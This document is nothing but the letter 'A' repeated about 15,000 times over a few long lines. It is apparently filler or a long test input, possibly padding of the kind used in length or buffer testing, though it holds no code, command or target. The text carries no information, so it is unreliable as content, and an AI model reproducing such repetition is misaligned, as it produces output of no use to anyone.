AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA